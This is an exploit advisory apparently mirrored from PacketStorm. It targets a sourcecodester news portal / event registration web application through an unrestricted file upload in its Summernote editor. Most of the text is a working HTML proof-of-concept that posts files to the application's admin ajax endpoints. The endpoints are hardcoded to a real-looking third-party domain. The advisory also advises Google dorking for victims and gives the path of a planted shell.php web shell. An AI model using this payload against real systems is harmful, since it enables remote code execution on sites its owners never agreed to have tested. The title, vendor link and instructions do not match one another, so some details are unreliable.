Share
## https://sploitus.com/exploit?id=PACKETSTORM:180245
=============================================================================================================================================  
| # Title : Event Registration and Attendance System 1.0 wysiwyg code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-news-portal.zip |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] infected item : admin_class.php  
  
$data .= ", content = '".htmlentities(str_replace("'","’",$content))."' ";  
if(!empty($_FILES['cover']['tmp_name'])){  
$fname = strtotime(date("Y-m-d H:i"))."_".(str_replace(" ","-",$_FILES['cover']['name']));  
$move = move_uploaded_file($_FILES['cover']['tmp_name'],'../assets/uploads/content_images/'. $fname);  
$protocol = strtolower(substr($_SERVER["SERVER_PROTOCOL"],0,5))=='https'?'https':'http';  
$hostName = $_SERVER['HTTP_HOST'];  
$path =explode('/',$_SERVER['PHP_SELF']);  
$currentPath = '/'.$path[1];   
if($move){  
$data .= ", cover_img='$fname' ";  
}  
}  
  
[+] Line 27 : Set your target url.  
  
[+] This payload is WYSIWYG based The page can be edited remotely and a malicious executable file can be uploaded ,via summernote is a WYSIWYG editor V: 0.8.18.  
  
  
[+] save payload as poc.html   
  
[+] payload :   
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>Manage About Page</title>  
<!-- Include Summernote CSS and jQuery -->  
<link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">  
<link href="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.css" rel="stylesheet">  
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>  
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>  
<script src="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.js"></script>  
</head>  
<body>  
<div class="container mt-5">  
<div class="col-lg-12">  
<div class="card card-outline card-primary">  
<div class="card-body">  
<form action="" id="manage-about">  
<div class="form-group">  
<textarea name="content" id="content" cols="30" rows="10" class="summernote2 form-control">  
<p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; color: rgb(0, 0, 0); font-family: 'Open Sans', Arial, sans-serif; font-size: 14px;">indoushka.</p>  
</textarea>  
</div>  
</form>  
</div>  
<div class="card-footer border-top border-info">  
<div class="d-flex w-100 justify-content-center align-items-center">  
<button class="btn btn-flat bg-gradient-primary mx-2" form="manage-about">Save</button>  
</div>  
</div>  
</div>  
</div>  
</div>  
  
<script>  
$(document).ready(function(){  
// Initialize Summernote Editor  
$('.summernote2').summernote({  
height: 300,  
toolbar: [  
['style', ['style']],  
['font', ['bold', 'italic', 'underline', 'strikethrough', 'superscript', 'subscript', 'clear']],  
['fontname', ['fontname']],  
['fontsize', ['fontsize']],  
['color', ['color']],  
['para', ['ol', 'ul', 'paragraph', 'height']],  
['table', ['table']],  
['insert', ['link', 'picture']],  
['view', ['undo', 'redo', 'fullscreen', 'codeview', 'help']]  
],  
callbacks: {  
onImageUpload: function(files) {  
saveImg(files[0]); // Handle image upload  
}  
}  
});  
  
// Function to save uploaded image  
function saveImg(_file) {  
var data = new FormData();  
data.append("file", _file);  
$.ajax({  
data: data,  
type: "POST",  
url: "http://www.news.witnessradio.org/admin/ajax.php?action=save_image",  
cache: false,  
contentType: false,  
processData: false,  
success: function(resp) {  
var image = $('<img>').attr('src', resp);  
$('.summernote2').summernote("insertNode", image[0]);  
}  
});  
}  
});  
  
// Form Submission  
$('#manage-about').submit(function(e) {  
e.preventDefault();  
start_load(); // Start a loading indicator (you need to define this function)  
$.ajax({  
url: 'http://www.news.witnessradio.org/admin/ajax.php?action=save_about',  
data: new FormData($(this)[0]),  
cache: false,  
contentType: false,  
processData: false,  
method: 'POST',  
type: 'POST',  
success: function(resp) {  
if(resp == 1) {  
alert_toast('Data successfully saved', "success");  
end_load(); // End the loading indicator (you need to define this function)  
}  
}  
});  
});  
  
// Optional: Define start_load and end_load functions  
function start_load() {  
// Add your loading indicator logic here  
}  
  
function end_load() {  
// Remove your loading indicator logic here  
}  
  
function alert_toast(message, type) {  
alert(message); // Basic alert. Replace with a better toast notification if needed.  
}  
</script>  
</body>  
</html>  
  
  
[+] path of evil : http://127.0.0.1/news_portal/assets/uploads/content_images/shell.php  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================